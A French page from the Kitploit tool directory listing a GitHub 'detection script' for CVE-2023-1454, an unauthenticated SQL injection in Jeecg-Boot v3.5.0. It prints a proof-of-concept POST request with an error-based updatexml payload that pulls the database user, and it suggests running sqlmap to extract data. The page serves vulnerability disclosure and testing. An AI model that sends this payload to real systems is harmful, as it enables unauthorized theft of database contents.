Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/bugfor-pings/cve-2023-1454
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubbugfor-pings/cve-2023-1454

CVE-2023-1454

CVE-2023-1454漏洞检测脚本

Voir le dépôt
1il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-1454

Script de détection de la vulnérabilité CVE-2023-1454

Ce document est fourni à titre informatif uniquement. N'utilisez pas les informations techniques et les outils de cet article pour pénétrer dans un système informatique sans autorisation. Toute conséquence directe ou indirecte et toute perte résultant de l'utilisation des informations fournies dans ce document relèvent de la seule responsabilité de l'utilisateur.

Introduction

Jeecg-Boot est une plateforme de développement low-code basée sur un générateur de code. Elle fournit une série de fonctionnalités telles que des générateurs de code, un moteur de templates, une gestion des autorisations, un dictionnaire de données, l'import/export de données, etc., permettant aux développeurs de créer rapidement des applications de niveau entreprise.

Aperçu de la vulnérabilité

La plateforme low-code Java pour applications Web d'entreprise Jeecg-Boot (v3.5.0) utilise le fichier jimureport-spring-boot-starter-1.5.6.jar. Le filtrage des caractères spéciaux dans Jeecg-Boot est défaillant. Dans la version v3.5.0 avec le front-end Vue3, Jeecg présente une injection SQL non autorisée. Le point de vulnérabilité se trouve dans le chemin /querySql, où le SQL appelé ne traite pas correctement le paramètre id, permettant ainsi une injection par erreur directe. Un attaquant distant non authentifié peut, en construisant une chaîne spéciale, obtenir des informations sensibles de la base de données cible.

Versions affectées

Version affectée : Jeecg-Boot = v3.5.0

Sauvegardez le paquet en .txt et utilisez sqlmap pour obtenir les données.

root@kitploit:~
POST /jmreport/qurestSql HTTP/1.1
    Host: xxx.xxx.xxx
    Content-Length: 0
    Content-Type: application/json
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
    
   {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

Télécharger l’outil